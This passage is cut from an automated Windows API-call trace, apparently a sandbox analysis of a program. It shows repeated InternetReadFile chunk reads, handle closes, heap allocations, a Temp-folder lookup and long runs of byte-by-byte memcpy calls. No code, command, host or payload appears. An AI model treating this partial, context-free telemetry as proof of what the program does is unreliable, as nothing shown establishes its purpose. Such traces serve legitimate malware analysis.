lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.277] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.288] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.288] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.288] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.290] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.290] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0174.345] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0174.346] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0174.350] GetProcessHeap () returned 0x4c0000 [0174.350] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x244) returned 0x504d20 [0174.351] GetProcessHeap () returned 0x4c0000 [0174.351] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1) returned 0x4e4a70 [0174.351] GetCurrentDirectoryA (in: nBufferLength=0x103, lpBuffer=0x504e60 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x24 [0174.352] GetProcessHeap () returned 0x4c0000 [0174.352] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x20) returned 0x4dbff8 [0174.353] GetProcessHeap () returned 0x4c0000 [0174.353] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x404) returned 0x4ec5c0 [0174.353] memcpy (in: _Dst=0x4ec5c0, _Src=0x8ceb0b5, _Size=0x404 | out: _Dst=0x4ec5c0) returned 0x4ec5c0 [0174.353] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4a3, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.353] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4a4, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4a5, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4a6, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4a7, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4a8, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4a9, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4aa, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4ab, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4ac, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4ad, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4ae, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.354] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4af, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4b0, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4b1, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4b2, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4b3, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4b4, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4b5, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4b6, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4b7, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] memcpy (in: _Dst=0x19869b, _Src=0x8ceb4b8, _Size=0x1 | out: _Dst=0x19869b) returned 0x19869b [0174.357] GetProcessHeap () returned 0x4c0000 [0174.358] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x80) returned 0x5061e8 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb214, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb215, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb216, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb217, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb218, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb219, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb21a, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb21b, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb21c, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb21d, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb21e, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb21f, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb220, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb221, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb222, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb223, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb224, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb225, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb226, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb227, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb228, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb229, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb22a, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb22b, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb22c, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb22d, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb22e, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb22f, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb230, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb231, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb232, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb233, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb234, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb235, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb236, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb237, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.358] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb238, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb239, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb23a, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb23b, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb23c, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb23d, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb23e, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb23f, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb240, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] memcpy (in: _Dst=0x1985e3, _Src=0x8ceb241, _Size=0x1 | out: _Dst=0x1985e3) returned 0x1985e3 [0174.359] GetProcessHeap () returned 0x4c0000 [0174.359] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x8) returned 0x4e4c10 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb214, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb215, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb216, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb217, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb218, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb219, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb21a, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb21b, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb21c, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb21d, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb21e, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb21f, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb220, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb221, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb222, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb223, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb224, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb225, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb226, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb227, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb228, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb229, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb22a, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb22b, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb22c, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb22d, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb22e, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.359] memcpy (in: _Dst=0x198323, _Src=0x8ceb22f, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb230, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb231, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb232, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb233, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb234, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb235, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb236, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb237, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb238, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb239, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb23a, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb23b, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb23c, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb23d, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb23e, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb23f, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb240, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x198323, _Src=0x8ceb241, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb214, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb215, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb216, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb217, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb218, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb219, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb21a, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb21b, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb21c, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb21d, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb21e, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb21f, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb220, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb221, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb222, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb223, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb224, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb225, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb226, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb227, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb228, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.360] memcpy (in: _Dst=0x19830f, _Src=0x8ceb229, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb22a, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb22b, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb22c, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb22d, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb22e, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb22f, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb230, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb231, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb232, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb233, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb234, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb235, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb236, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb237, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb238, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb239, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb23a, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb23b, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb23c, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb23d, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb23e, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb23f, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb240, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19830f, _Src=0x8ceb241, _Size=0x1 | out: _Dst=0x19830f) returned 0x19830f [0174.361] memcpy (in: _Dst=0x19841c, _Src=0x8ceb242, _Size=0xc | out: _Dst=0x19841c) returned 0x19841c [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb272, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb273, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb274, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb275, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb276, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb277, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb278, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb279, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb27a, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb27b, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb27c, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, _Src=0x8ceb27d, _Size=0x1 | out: _Dst=0x198323) returned 0x198323 [0174.361] memcpy (in: _Dst=0x198323, 